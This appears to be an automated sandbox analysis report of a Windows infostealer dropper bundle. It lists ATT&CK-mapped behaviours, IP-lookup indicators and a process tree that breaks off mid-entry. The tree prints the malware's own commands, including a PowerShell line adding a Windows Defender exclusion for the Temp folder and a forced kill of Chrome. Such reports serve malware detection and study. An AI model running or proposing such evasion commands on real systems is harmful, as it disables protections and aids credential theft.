djvu | f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7

System Information Discovery

Processes:

7362389.scrWMIADAP.EXEEFSrSTr3JXsgTz2Mqfr4osXz.exe6716952.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7362389.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7362389.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WMIADAP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WMIADAP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EFSrSTr3JXsgTz2Mqfr4osXz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EFSrSTr3JXsgTz2Mqfr4osXz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6716952.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6716952.scr

Loads dropped DLL 11 IoCs

Processes:

setup_install.exeThu11b9fee5fd5b3c.tmpThu112e5981b78.tmpsetup_2.tmpThu1189012621353ba47.exe

pid	process
4748	setup_install.exe
4748	setup_install.exe
4748	setup_install.exe
4748	setup_install.exe
4748	setup_install.exe
676	Thu11b9fee5fd5b3c.tmp
676	Thu11b9fee5fd5b3c.tmp
392	Thu112e5981b78.tmp
4048	setup_2.tmp
3224	Thu1189012621353ba47.exe
3224	Thu1189012621353ba47.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

9480 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
9480	icacls.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\6716952.scr	themida
behavioral4/memory/4896-327-0x00000000010A0000-0x00000000010A1000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

6716952.scr7362389.scrEFSrSTr3JXsgTz2Mqfr4osXz.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6716952.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7362389.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	EFSrSTr3JXsgTz2Mqfr4osXz.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
404	api.2ip.ua
632	api.2ip.ua
5135	api.2ip.ua
17	ipinfo.io
210	ipinfo.io
371	ipinfo.io
8	ip-api.com
209	ipinfo.io
372	ipinfo.io
406	api.2ip.ua
5118	api.2ip.ua
11	ipinfo.io
38	ipinfo.io
252	ip-api.com
5904	api.2ip.ua

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

6716952.scr7362389.scrWMIADAP.EXEEFSrSTr3JXsgTz2Mqfr4osXz.exeeT_9cn5sogyGhue3prfopPYK.exe

pid	process
4896	6716952.scr
3364	7362389.scr
5140	WMIADAP.EXE
5928	EFSrSTr3JXsgTz2Mqfr4osXz.exe
2704	eT_9cn5sogyGhue3prfopPYK.exe
2704	eT_9cn5sogyGhue3prfopPYK.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Thu118c8b4c3885d897d.exeThu1170fdf4c09b1.exetmp8A78_tmp.exepUiOCGpiuWE56__g7zn7wgiy.exe

description	pid	process	target process
PID 744 set thread context of 2880	744	Thu118c8b4c3885d897d.exe	Thu118c8b4c3885d897d.exe
PID 3132 set thread context of 3940	3132	Thu1170fdf4c09b1.exe	Thu1170fdf4c09b1.exe
PID 4580 set thread context of 4868	4580	tmp8A78_tmp.exe	tmp8A78_tmp.exe
PID 5984 set thread context of 4624	5984	pUiOCGpiuWE56__g7zn7wgiy.exe	pUiOCGpiuWE56__g7zn7wgiy.exe

Drops file in Program Files directory 1 IoCs

Processes:

Setup.exe

description ioc process

File opened for modification C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe Setup.exe
Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe	Setup.exe

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Program crash 20 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5080	1616	WerFault.exe	Thu117e9466431bbb9f.exe
4588	2692	WerFault.exe	ShadowVPNInstaller_v4.exe
508	1616	WerFault.exe	Thu117e9466431bbb9f.exe
3432	4176	WerFault.exe	setup.exe
1612	4176	WerFault.exe	setup.exe
4440	1616	WerFault.exe	Thu117e9466431bbb9f.exe
4804	4176	WerFault.exe	setup.exe
3984	1616	WerFault.exe	Thu117e9466431bbb9f.exe
4060	4176	WerFault.exe	setup.exe
3168	4176	WerFault.exe	setup.exe
4220	3888	WerFault.exe	2.exe
5128	2692	WerFault.exe	ShadowVPNInstaller_v4.exe
5248	2692	WerFault.exe	ShadowVPNInstaller_v4.exe
5540	1616	WerFault.exe	Thu117e9466431bbb9f.exe
5684	2692	WerFault.exe	ShadowVPNInstaller_v4.exe
5920	4176	WerFault.exe	setup.exe
5272	2692	WerFault.exe	ShadowVPNInstaller_v4.exe
5352	5096	WerFault.exe	6.exe
1068	4176	WerFault.exe	setup.exe
4640	1616	WerFault.exe	Thu117e9466431bbb9f.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Thu11787d2b833e6.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Thu1189012621353ba47.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Thu1189012621353ba47.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Thu1189012621353ba47.exe

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4012	schtasks.exe
8640	schtasks.exe
2536	schtasks.exe
10896	schtasks.exe
11220	schtasks.exe
4900	schtasks.exe
6440	schtasks.exe
408	schtasks.exe
9416	schtasks.exe
3160	schtasks.exe
7388	schtasks.exe
10140	schtasks.exe
9072	schtasks.exe
9828	schtasks.exe
6104	schtasks.exe
3932	schtasks.exe
8628	schtasks.exe
9116	schtasks.exe

Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

8848 timeout.exe
6648 timeout.exe
7324 timeout.exe
8640 timeout.exe
8884 timeout.exe
1688 timeout.exe

pid	process
8848	timeout.exe
6648	timeout.exe
7324	timeout.exe
8640	timeout.exe
8884	timeout.exe
1688	timeout.exe

Kills process with taskkill 12 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2980	taskkill.exe
6028	taskkill.exe
8876	taskkill.exe
6556	taskkill.exe
4928	taskkill.exe
5856	taskkill.exe
4172	taskkill.exe
9144	taskkill.exe
6260	taskkill.exe
7272	taskkill.exe
10796	taskkill.exe
9492	taskkill.exe

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	72	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	75	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	163	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	166	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Thu11787d2b833e6.exepowershell.exeThu11f1187a97f50d9c.exe

pid	process
3700	Thu11787d2b833e6.exe
3700	Thu11787d2b833e6.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe
4172	Thu11f1187a97f50d9c.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Thu11787d2b833e6.exe

pid process

3700 Thu11787d2b833e6.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Thu118764660749a3b.exeThu1160e2804caf.exeThu115049bf2e.exepowershell.exeThu1171b1ca5023f5d2.exe5599974.scrPublicDwlBrowser1100.exe2.exeWerFault.exeWerFault.exeWerFault.exeSetup.exe

description	pid	process
Token: SeCreateTokenPrivilege	4128	Thu118764660749a3b.exe
Token: SeAssignPrimaryTokenPrivilege	4128	Thu118764660749a3b.exe
Token: SeLockMemoryPrivilege	4128	Thu118764660749a3b.exe
Token: SeIncreaseQuotaPrivilege	4128	Thu118764660749a3b.exe
Token: SeMachineAccountPrivilege	4128	Thu118764660749a3b.exe
Token: SeTcbPrivilege	4128	Thu118764660749a3b.exe
Token: SeSecurityPrivilege	4128	Thu118764660749a3b.exe
Token: SeTakeOwnershipPrivilege	4128	Thu118764660749a3b.exe
Token: SeLoadDriverPrivilege	4128	Thu118764660749a3b.exe
Token: SeSystemProfilePrivilege	4128	Thu118764660749a3b.exe
Token: SeSystemtimePrivilege	4128	Thu118764660749a3b.exe
Token: SeProfSingleProcessPrivilege	4128	Thu118764660749a3b.exe
Token: SeIncBasePriorityPrivilege	4128	Thu118764660749a3b.exe
Token: SeCreatePagefilePrivilege	4128	Thu118764660749a3b.exe
Token: SeCreatePermanentPrivilege	4128	Thu118764660749a3b.exe
Token: SeBackupPrivilege	4128	Thu118764660749a3b.exe
Token: SeRestorePrivilege	4128	Thu118764660749a3b.exe
Token: SeShutdownPrivilege	4128	Thu118764660749a3b.exe
Token: SeDebugPrivilege	4128	Thu118764660749a3b.exe
Token: SeAuditPrivilege	4128	Thu118764660749a3b.exe
Token: SeSystemEnvironmentPrivilege	4128	Thu118764660749a3b.exe
Token: SeChangeNotifyPrivilege	4128	Thu118764660749a3b.exe
Token: SeRemoteShutdownPrivilege	4128	Thu118764660749a3b.exe
Token: SeUndockPrivilege	4128	Thu118764660749a3b.exe
Token: SeSyncAgentPrivilege	4128	Thu118764660749a3b.exe
Token: SeEnableDelegationPrivilege	4128	Thu118764660749a3b.exe
Token: SeManageVolumePrivilege	4128	Thu118764660749a3b.exe
Token: SeImpersonatePrivilege	4128	Thu118764660749a3b.exe
Token: SeCreateGlobalPrivilege	4128	Thu118764660749a3b.exe
Token: 31	4128	Thu118764660749a3b.exe
Token: 32	4128	Thu118764660749a3b.exe
Token: 33	4128	Thu118764660749a3b.exe
Token: 34	4128	Thu118764660749a3b.exe
Token: 35	4128	Thu118764660749a3b.exe
Token: SeDebugPrivilege	2928	Thu1160e2804caf.exe
Token: SeDebugPrivilege	1968	Thu115049bf2e.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4264	Thu1171b1ca5023f5d2.exe
Token: SeDebugPrivilege	4496	5599974.scr
Token: SeDebugPrivilege	4900	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	3888	2.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeRestorePrivilege	4588	WerFault.exe
Token: SeBackupPrivilege	4588	WerFault.exe
Token: SeRestorePrivilege	5080	WerFault.exe
Token: SeBackupPrivilege	5080	WerFault.exe
Token: SeBackupPrivilege	5080	WerFault.exe
Token: SeDebugPrivilege	4588	WerFault.exe
Token: SeDebugPrivilege	5080	WerFault.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeDebugPrivilege	508	WerFault.exe
Token: SeDebugPrivilege	3432	Setup.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Thu11b9fee5fd5b3c.tmp

pid process

676 Thu11b9fee5fd5b3c.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

eT_9cn5sogyGhue3prfopPYK.exe

pid process

2704 eT_9cn5sogyGhue3prfopPYK.exe

pid	process
676	Thu11b9fee5fd5b3c.tmp

pid	process
2704	eT_9cn5sogyGhue3prfopPYK.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4648 wrote to memory of 4684	4648	setup_x86_x64_install.exe	setup_installer.exe
PID 4648 wrote to memory of 4684	4648	setup_x86_x64_install.exe	setup_installer.exe
PID 4648 wrote to memory of 4684	4648	setup_x86_x64_install.exe	setup_installer.exe
PID 4684 wrote to memory of 4748	4684	setup_installer.exe	setup_install.exe
PID 4684 wrote to memory of 4748	4684	setup_installer.exe	setup_install.exe
PID 4684 wrote to memory of 4748	4684	setup_installer.exe	setup_install.exe
PID 4748 wrote to memory of 4908	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4908	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4908	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4920	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4920	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4920	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4936	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4936	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4936	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4952	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4952	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4952	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4980	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4980	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4980	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5000	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5000	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5000	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5016	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5016	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5016	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5036	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5036	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5036	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5060	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5060	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5060	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5076	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5076	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5076	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5096	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5096	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5096	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5112	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5112	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 5112	4748	setup_install.exe	cmd.exe
PID 4908 wrote to memory of 4104	4908	cmd.exe	powershell.exe
PID 4908 wrote to memory of 4104	4908	cmd.exe	powershell.exe
PID 4908 wrote to memory of 4104	4908	cmd.exe	powershell.exe
PID 4952 wrote to memory of 4128	4952	cmd.exe	Thu118764660749a3b.exe
PID 4952 wrote to memory of 4128	4952	cmd.exe	Thu118764660749a3b.exe
PID 4952 wrote to memory of 4128	4952	cmd.exe	Thu118764660749a3b.exe
PID 4748 wrote to memory of 4140	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4140	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 4140	4748	setup_install.exe	cmd.exe
PID 4980 wrote to memory of 1616	4980	cmd.exe	Thu117e9466431bbb9f.exe
PID 4980 wrote to memory of 1616	4980	cmd.exe	Thu117e9466431bbb9f.exe
PID 4980 wrote to memory of 1616	4980	cmd.exe	Thu117e9466431bbb9f.exe
PID 4920 wrote to memory of 1968	4920	cmd.exe	Thu115049bf2e.exe
PID 4920 wrote to memory of 1968	4920	cmd.exe	Thu115049bf2e.exe
PID 4936 wrote to memory of 344	4936	cmd.exe	Thu11b9fee5fd5b3c.exe
PID 4936 wrote to memory of 344	4936	cmd.exe	Thu11b9fee5fd5b3c.exe
PID 4936 wrote to memory of 344	4936	cmd.exe	Thu11b9fee5fd5b3c.exe
PID 4748 wrote to memory of 3428	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 3428	4748	setup_install.exe	cmd.exe
PID 4748 wrote to memory of 3428	4748	setup_install.exe	cmd.exe
PID 5000 wrote to memory of 3560	5000	cmd.exe	Thu116d4ab7efb7.exe
PID 5000 wrote to memory of 3560	5000	cmd.exe	Thu116d4ab7efb7.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu115049bf2e.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu115049bf2e.exe
        
        Thu115049bf2e.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
      - C:\Users\Admin\AppData\Roaming\5599974.scr
        
        "C:\Users\Admin\AppData\Roaming\5599974.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
      - C:\Users\Admin\AppData\Roaming\6716952.scr
        
        "C:\Users\Admin\AppData\Roaming\6716952.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4896
      - C:\Users\Admin\AppData\Roaming\3567581.scr
        
        "C:\Users\Admin\AppData\Roaming\3567581.scr" /S
        6⤵
        Executes dropped EXE
        
        PID:3964
      - C:\Users\Admin\AppData\Roaming\7362389.scr
        
        "C:\Users\Admin\AppData\Roaming\7362389.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4936
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11b9fee5fd5b3c.exe
        
        Thu11b9fee5fd5b3c.exe
        5⤵
        Executes dropped EXE
        
        PID:344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118764660749a3b.exe
        
        Thu118764660749a3b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:6028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu117e9466431bbb9f.exe
        
        Thu117e9466431bbb9f.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 656
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 672
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:508
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 684
        6⤵
        Program crash
        
        PID:4440
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 636
        6⤵
        Program crash
        
        PID:3984
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 888
        6⤵
        Program crash
        
        PID:5540
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 1100
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu113e650b5e.exe
      4⤵
      PID:5036
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu113e650b5e.exe
        
        Thu113e650b5e.exe
        5⤵
        Executes dropped EXE
        
        PID:3828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe
      4⤵
      PID:5016
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11787d2b833e6.exe
        
        Thu11787d2b833e6.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu116d4ab7efb7.exe
        
        Thu116d4ab7efb7.exe
        5⤵
        Executes dropped EXE
        
        PID:3560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu112e5981b78.exe
      4⤵
      PID:5060
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu112e5981b78.exe
        
        Thu112e5981b78.exe
        5⤵
        Executes dropped EXE
        
        PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe
      4⤵
      PID:5076
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1160e2804caf.exe
        
        Thu1160e2804caf.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
